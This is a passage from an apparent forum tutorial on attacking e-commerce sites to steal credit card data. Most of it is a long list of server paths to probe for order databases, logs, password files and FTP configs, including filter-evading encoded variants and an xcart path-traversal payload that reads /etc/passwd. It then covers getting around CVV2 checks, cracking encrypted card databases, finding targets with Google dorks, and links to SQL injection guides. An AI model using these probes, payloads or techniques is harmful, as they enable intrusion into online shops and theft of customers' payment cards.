  1509. /store/info.xml

  1510. /store/lib.inc

  1511. /store/lib.inc.php

  1512. /store/lists.csv

  1513. /store/log_files/

  1514. /store/order.log

  1515. /store/order.sql

  1516. /store/orderdetalis.aspx

  1517. /store/orders

  1518. /store/orders.log

  1519. /store/orders.mdb

  1520. /store/orders.sql

  1521. /store/pgp_encrypt/cc_store_lib.pm

  1522. /store/pgp_encrypt/order_admin.cgi

  1523. /store/pgp_encrypt/pgp_lib.pm

  1524. /store/pgp_encrypt/print_invoice.cgi

  1525. /store/pgp_encrypt/process.cgi

  1526. /store/pgp_encrypt/store_admin.cgi

  1527. /store/pgp_encrypt/store_params.cgi

  1528. /store/pgp_encrypt/validate_card.pm

  1529. /store/quikstore.cgi?store='

  1530. /store/secure/

  1531. /store/show_cart.inc.php

  1532. /store/stats.php

  1533. /store/store.dat

  1534. /store/store.db

  1535. /store/store.log

  1536. /store/store.mdb

  1537. /store/store.nsf

  1538. /store/store.sql

  1539. /store/storeadmin

  1540. /store/storeadmin/

  1541. /store/temp_customers/

  1542. /store/temp_orders/

  1543. /store/test.log

  1544. /store/vars.txt

  1545. /store/web.xml

  1546. /store/ws%5fftp.ini

  1547. /store/ws_%66tp.ini

  1548. /store/ws_f%74p.ini

  1549. /store/ws_ft%70.ini

  1550. /store/ws_ftp%2eini

  1551. /store/ws_ftp.%69ni

  1552. /store/ws_ftp.i%6ei

  1553. /store/ws_ftp.in%69

  1554. /store/ws_ftp.ini

  1555. /store/ws_ftp.log

  1556. /storeadmin

  1557. /storeadmin/

  1558. /storefront.mdb

  1559. /storefrontpro50.tem/

  1560. /storemgr/

  1561. /stores/

  1562. /stores/registry.dat

  1563. /usersorder/

  1564. /usersorders/

  1565. /virtuastore.mdb

  1566. /virtuastore/

  1567. /virtuastore/database/virtuastore.mdb

  1568. /web_store.cgi

  1569. /webcart

  1570. /webcart-lite

  1571. /webcart-lite/

  1572. /webcart-lite/config/clients.txt

  1573. /webcart-lite/config/import.txt

  1574. /webcart-lite/orders/import.txt

  1575. /webcart/

  1576. /webcart/carts

  1577. /webcart/carts/

  1578. /webcart/config/

  1579. /webcart/config/clients.txt

  1580. /webcart/orders/

  1581. /webcart/orders/carts/.txt

  1582. /webcart/orders/import.txt

  1583. /webcash

  1584. /webcash/

  1585. /webcash/.dbusers.db

  1586. /webcash/.htaccess

  1587. /webcash/.htlilyfire

  1588. /webcash/.htpass-4.new

  1589. /webcash/.htpasswd

  1590. /webcash/.htpasswd.aknk

  1591. /webcash/.htpasswd.nten

  1592. /webcash/.htpasswd.slez

  1593. /webcash/.htusers

  1594. /webcash/.passwrd

  1595. /webcash/.pwd

  1596. /webcash/_privat/.htpasswd

  1597. /webcash/access/.htpasswd

  1598. /webcash/acctman/info/.htpasswd

  1599. /webcash/admin/db/htpasswd

  1600. /webcash/ats/logs/writeto.txt

  1601. /webcash/ccbill/.htpasswd

  1602. /webcash/ccbill/members/.htpasswd

  1603. /webcash/ccbill/password/.htpasswd

  1604. /webcash/ccbill/secure/ccbill.log

  1605. /webcash/cgi-bin/am/codes/htpasswd

  1606. /webcash/cgi-bin/database/passwords

  1607. /webcash/cgi-bin/ib/data/htpasswd

  1608. /webcash/cgi-bin/mastergate/passwords

  1609. /webcash/cgi-bin/passwd/.htpasswd

  1610. /webcash/cgi-bin/passwords

  1611. /webcash/cgi-bin/test.cgi

  1612. /webcash/cgi-bin2/ampro/info/.htpasswd

  1613. /webcash/cgibin/.htpasswd

  1614. /webcash/cgibin/ibp5/passwords.temp

  1615. /webcash/cgibin/mastergate/passwords

  1616. /webcash/cgibin/members/htdata/.htpasswd

  1617. /webcash/cgibin/passwords

  1618. /webcash/client.log

  1619. /webcash/cohfmembers/.htpasswd

  1620. /webcash/crontab.txt

  1621. /webcash/data/passwdfile

  1622. /webcash/database/.pnppasswd

  1623. /webcash/deep/.htpasswd

  1624. /webcash/dmr/.htpasswd.ass

  1625. /webcash/drowssap/.htpasswd

  1626. /webcash/expire.txt

  1627. /webcash/htusers

  1628. /webstore/

  1629. /webstore/Admin_files/

  1630. /webstore/addcustomer.php

  1631. /webstore/admin/addcustomer.php

  1632. /xcart/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd

  1633. /xdatabase/MFIIstore.ldb

  1634. /xdatabase/MFIIstore.mdb

  1635. /xshop.mdb

  1636. /~authorizenet.cgi

  1637. /~cgi-bin/authorizenet.cgi/

  1638. /~webcash

  1639. /~webcash/

  1640.  



The only problem with database vulnerabilities for a carder is that some of these don't reveal the cvv2 of the card number, which is of course usually needed to use the cc (except of course with many online shopping sites that you can simply put 000 or 0000 as the cvv2). Also many of the databases are encrypted using either blowfish or rc4. You can use John the Ripper (http://www.openwall.com/john/) to crack blowfish, and I'm sure there are some crackers out there that you can use to crack rc4. Here are some examples of each encryption provided by esc from the Igniteds community of each encryption...
RC4 = *xco[aOßI
Blowfish= |AA|BC|
Good luck.

Section 3: Google Syntax

A quick tip for finding database vulnerabilities besides scanning for them using an exploiter is to use googledorks. To do this just take the exploit you're interested in looking for, and for example add an inurl: to the search. For example "inurl:xshop.mdb" could be used to find all the sites that the google spider has found that contain this file (except of course the sites that blocked this file from being listed using a robots.txt for example).

Section 4: SQL Injection

Of course what remains a very popular method for exploiting ecommerce sites is to use SQL injection. It has been covered many times, and is very common among web servers. Since it has been covered so many times I will simply include a list of guides that you can read to familiarize yourself with SQL injection. This list will include the names and location of the guides, and if for some reason any of the links become broken just slap the title of the guide into quotations on google and search for them...

Advanced SQL Injection: http://www.ngssoftware.com/papers/advan ... ection.pdf ... ection.pdf

More Advanced SQL Injection: http://www.stickyminds.com/getfile.asp? ... ame1%2Epdf? ... ame1%2Epdf

Demystifying SQL Injections: http://www.informationleak.net/sql_inject.txt

XSS & SQL Injection:http://www.hackthissite.org/articles/read/23

Section 5: The Conclusion

Well that's the conclusion for this guide. There are other methods as with any type of web server that could be used to exploit ecommerce sites, but this tutorial is meant as a basic rundown of some methods that could be used. If you are doing a security scan for an ecommerce site and come across a vulnerability that you are not familiar with, or don't know how to use to test don't be afraid to just google it. I'd also like to briefly thank s4mael from CCPower, who put together the exploit list that the database vulnerabilities listed were copied from. Also if you have any questions or comments then feel free to email me at murdermouse@informationleak.net. I must remind you before you do so that I'm not a carder, nor do I provide any type of services to any. Don't ask me if I have cc's, I don't have cc's and I will not help you get cc's.

Link: http://www.informationleak.org/viewtopic.php?f=46&t=5129#47775
Rating: - 0 out of 0 votes